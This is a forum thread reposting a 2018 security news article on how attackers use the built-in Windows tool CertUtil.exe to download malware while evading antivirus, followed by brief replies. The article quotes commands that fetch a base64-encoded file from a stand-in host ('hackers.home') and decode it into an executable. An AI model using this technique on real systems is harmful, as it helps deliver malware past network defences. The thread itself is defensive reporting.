WALLONN7 Posted April 4, 2018 Share Posted April 4, 2018 CertUtil.exe Could Allow Attackers To Download Malware While Bypassing AV Windows has a built-in program called CertUtil, which can be used to manage certificates in Windows. Using this program you can install, backup, delete, manage, and perform various functions related to certificates and certificate stores in Windows. One of the features of CertUtil is the ability to download a certificate, or any other file for that matter, from a remote URL and save it as a local file using the syntax "certutil.exe -urlcache -split -f output.file". Security researcher Casey Smith tweeted in 2017 his concerns that this method could be used to download malware. Smith's concerns were warranted as attackers have been utilizing CertUtil to download malware for quite a while. This sample utilized it in 2016 and a recent Trojan from March 2018 also utilizes it to download various batch files and scripts to an infected computer. CertUtil being used in a recent Trojan You may be wondering why attackers would use CertUtil when they already have a foothold on a computer? This is because some computers may be locked down so that unknown applications are unable to download programs. By using a built-in Windows program, there is a possibility that CertUtil would be whitelisted by installed security programs and thus be allowed to download files. This utilization of legitimate Windows programs to download and execute malware is not as it the Windows regsvr32.exe executable can be used in a similar manner. Using CertUtil+Base64 to Bypass Security Software Today security consultant and ISC Handler Xavier Mertens published a handler diary that adds a twist to the use of CertUtil that may make it easier for attacker's downloads to remain undetected by edge security devices. This is to first base64 encode the malicious file so it appears as harmless text and then decode it after it has been downloaded using CertUtil.exe. As already discussed, you can download a file using CertUtil.exe by using the following command: certutil.exe -urlcache -split -f [URL] output.file This will download the file in its original form and save it to the computer. The problem with this method is that network security devices can detect the file as malicious and block it. To get past this, Mertens came up with the idea of first base64 encoding the malicious file so that to an edge device it just appears as harmless text. Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file into the executable. This is illustrated in Mertens' handler diary. C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe This method potentially gets it past an edge device without being detected and then be converted back into the executable on the local machine where it may not be as secure. While, I had not known of this actually being used in the wild, MalwareHunterTeam told me that the use of certutil.exe -decode is already being used. Examples can be seen in these samples. In addition, post-publication, we also discovered this write-up from F5 Labs detailing a campaign using CertUtil.exe to install coinminers on Windows. Furthermore, Kaspersky security researcher Fabio Assolini alerted us that this method has been used by Brazilian coders for some time. https://twitter.com/assolini/status/981608599100289024 As you can see, new tricks are thought up every day utilizing what would normally be safe and legitimate Windows programs. For those who are not using CertUtil to access remote certificates or servers, you may want to lock down its ability to connect to the Internet. Update 4/4/18 15:13 EST: Updated to include more information about this method being used in the wild. Source Link to comment Share on other sites More sharing options...
straycat19 Posted April 5, 2018 Share Posted April 5, 2018 Won't work on any of my systems. Software restriction policy prevents it from running unless I temporarily turn it off. For all of you that believe AV software protects your system, it only will if you can restrict the files that it allows to run and you don't need extra software to do that, just edit your GPO. Link to comment Share on other sites More sharing options...
Administrator DKT27 Posted April 5, 2018 Administrator Share Posted April 5, 2018 @WALLONN7: You need to fix those links there. Link to comment Share on other sites More sharing options...
WALLONN7 Posted April 5, 2018 Author Share Posted April 5, 2018 2 hours ago, DKT27 said: @WALLONN7: You need to fix those links there. Edited... 1+ for letting me know... The strange thing is that there was no problem at the time of the posting and the same was seen when I was notified of the first response in the topic... Link to comment Share on other sites More sharing options...
Administrator DKT27 Posted April 5, 2018 Administrator Share Posted April 5, 2018 6 minutes ago, WALLONN7 said: Edited... 1+ for letting me know... The strange thing is that there was no problem at the time of the posting and the same was seen when I was notified of the first response in the topic... You still need to fix the source link. The logs show only you have edited it, that too, only once, that you did right now to fix those links here. Link to comment Share on other sites More sharing options...
WALLONN7 Posted April 5, 2018 Author Share Posted April 5, 2018 7 minutes ago, DKT27 said: You still need to fix the source link. The logs show only you have edited it, that too, only once, that you did right now to fix those links here. Fixed... "In all these years in this vital industry, this is the first time that this happens to me"... Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.